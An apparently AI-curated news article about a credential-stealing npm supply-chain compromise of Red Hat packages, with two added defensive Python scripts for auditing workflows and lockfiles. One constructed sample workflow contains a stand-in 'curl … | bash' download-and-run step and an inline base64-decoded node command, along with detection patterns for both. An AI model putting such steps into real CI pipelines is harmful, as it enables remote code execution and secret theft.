
Red Hat npm Packages Infected with Credential Stealer – Over 30 Releases Affected

Bottom line: At least 32 Red Hat npm packages were infected with a credential stealer that simultaneously manipulated GitHub workflows to publish additional packages with forged SLSA attestations and expand supply chain access.

Unknown attackers have compromised at least 32 npm packages from the Red Hat Cloud Services namespace and infected them with malware that exfiltrates developer credentials and authentication tokens from local environments and CI/CD systems.

Security researchers from Wiz, OX Security, and other organizations document a supply chain campaign tracked under the name Miasma and considered an evolution of the Shai-Hulud malware family. Developers downloaded the compromised packages over the weekend; together, the affected packages average approximately 80,000 weekly downloads. According to Wiz analysis, the malware used originated from the Mini-Shai-Hulud family, which had appeared multiple times in npm ecosystem attacks and traces back to TeamPCP.

The attackers added malware that executes automatically during the installation of these packages. The malicious program was designed to collect npm authentication tokens, environment variables, cloud credentials, and other sensitive information. Particularly relevant for CTOs: the attackers also modified GitHub Actions workflows to make illegitimate package publications appear legitimate. The modified workflows requested GitHub OpenID Connect (OIDC) tokens and executed obfuscated code that published packages with valid SLSA provenance attestations – a technique already observed in earlier attacks against TanStack by the same actors.
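The workflow manipulation described above is something a maintainer can screen for in a pull request review. The following is an added example, not code from the article or from Red Hat, and the workflow it scans is a constructed sample rather than one of the affected repositories. It flags a workflow that both grants the OIDC permission (`id-token: write`) and runs `npm publish --provenance`, and it flags `run:` steps that decode or download code at run time, which is where obfuscated publishing logic would typically hide.

```python
import re

# Constructed sample workflow (assumption): it is not taken from any Red Hat repository.
SAMPLE_WORKFLOW = """\
name: release
on:
  push:
    tags: ['v*']
permissions:
  contents: read
  id-token: write
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: curl -s https://example.invalid/x.sh | bash
      - run: node -e "$(echo Y29uc29sZS5sb2coMSk= | base64 -d)"
      - run: npm publish --provenance --access public
"""

# Constructed benign workflow used as a negative control.
SAFE_WORKFLOW = """\
name: ci
on: [push]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

# Heuristic patterns for run-time code loading inside a `run:` step.
RISKY_RUN = [
    (re.compile(r"base64\s+(-d|--decode)\b"), "decodes base64 at run time"),
    (re.compile(r"\bnode\s+-e\b"), "executes inline node code"),
    (re.compile(r"curl[^|]*\|\s*(ba)?sh\b"), "pipes a download into a shell"),
]


def audit_workflow(text: str) -> list[str]:
    """Return human-readable findings for one GitHub Actions workflow file.

    Line-based on purpose: it only looks at single-line `run:` steps, so a
    multi-line `run: |` block must be reviewed by hand.
    """
    findings = []
    lines = text.splitlines()
    grants_oidc = any(re.match(r"\s*id-token:\s*write\b", line) for line in lines)
    publishes = any("npm publish" in line and "--provenance" in line for line in lines)
    if grants_oidc and publishes:
        findings.append("workflow can mint OIDC tokens and publish with provenance")
    for number, line in enumerate(lines, 1):
        if not re.match(r"\s*-?\s*run:", line):
            continue
        for pattern, why in RISKY_RUN:
            if pattern.search(line):
                findings.append(f"line {number}: {why}")
    return findings


if __name__ == "__main__":
    for finding in audit_workflow(SAMPLE_WORKFLOW):
        print(finding)
```

The OIDC-plus-provenance combination is not malicious by itself; it is exactly how legitimate trusted publishing works. The point of flagging it is that any change touching such a workflow deserves a careful review, because a compromised workflow with that permission can publish a package that carries a valid SLSA attestation.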

The strategic objective of the campaign was not only immediate credential theft, but persistent presence and lateral movement. The malware specifically searched for publishing credentials to gain access to additional developer accounts and repositories. By the time of analysis, most infected versions had already been removed from the npm repository.

Affected organizations should immediately verify whether the manipulated packages were installed. Wiz recommends: rotate potentially compromised secrets, revoke and reissue npm publishing tokens, and review repository and package publishing activity. Since Red Hat Cloud Services is widely trusted in the enterprise environment, a rapid audit is necessary to identify any attacker who has already moved laterally.
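The first step in that response, checking whether an affected version was ever installed, can be done from the project's lockfile. The following is an added example, not code from Wiz or Red Hat. It reads an npm `package-lock.json` (lockfileVersion 3 layout), reports installed packages matching an affected list, and also reports every dependency npm marked with `hasInstallScript`, because the malware ran during installation. The affected list is a placeholder: the article does not name the packages or versions, so the real list must be taken from the Wiz and OX Security advisories, and the scope name used here is assumed.

```python
import json

# Placeholder affected set (assumption): the article names no packages or versions,
# so replace this with the list from the published advisories before use.
AFFECTED = {
    "@redhat-cloud-services/placeholder-pkg": {"0.0.0-placeholder"},
}

# Constructed lockfile in npm's lockfileVersion 3 layout; not a real project's file.
SAMPLE_LOCK = json.dumps({
    "name": "app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "app"},
        "node_modules/@redhat-cloud-services/placeholder-pkg": {
            "version": "0.0.0-placeholder",
            "hasInstallScript": True,
        },
        "node_modules/left-pad": {"version": "1.3.0"},
        "node_modules/some-native-addon": {"version": "2.0.0", "hasInstallScript": True},
    },
})


def audit_lockfile(lock_text: str, affected: dict[str, set[str]]) -> dict[str, list]:
    """Scan a package-lock.json for affected versions and install-script packages.

    Lockfile paths look like "node_modules/a/node_modules/@scope/b"; the package
    name is everything after the last "node_modules/" segment.
    """
    lock = json.loads(lock_text)
    hits, scripted = [], []
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # the root project entry
        name = path.rsplit("node_modules/", 1)[-1]
        version = meta.get("version")
        if version in affected.get(name, set()):
            hits.append((name, version))
        if meta.get("hasInstallScript"):
            scripted.append((name, version))
    return {"affected": hits, "install_scripts": scripted}


if __name__ == "__main__":
    report = audit_lockfile(SAMPLE_LOCK, AFFECTED)
    for name, version in report["affected"]:
        print(f"AFFECTED: {name}@{version} is installed; treat host and CI secrets as compromised")
    for name, version in report["install_scripts"]:
        print(f"install script: {name}@{version}")
```

A hit in `affected` means the install-time credential collection described in the article could have run on every machine and CI runner that installed from that lockfile, which is the population whose secrets need rotating. Packages in `install_scripts` are not necessarily malicious (native addons legitimately build during installation), but they are the ones to inspect first when an exact affected list is not yet available.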


Source: www.csoonline.com · Published June 2, 2026
Lumi AI News — AI-assisted curation according to Art. 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.2.9.
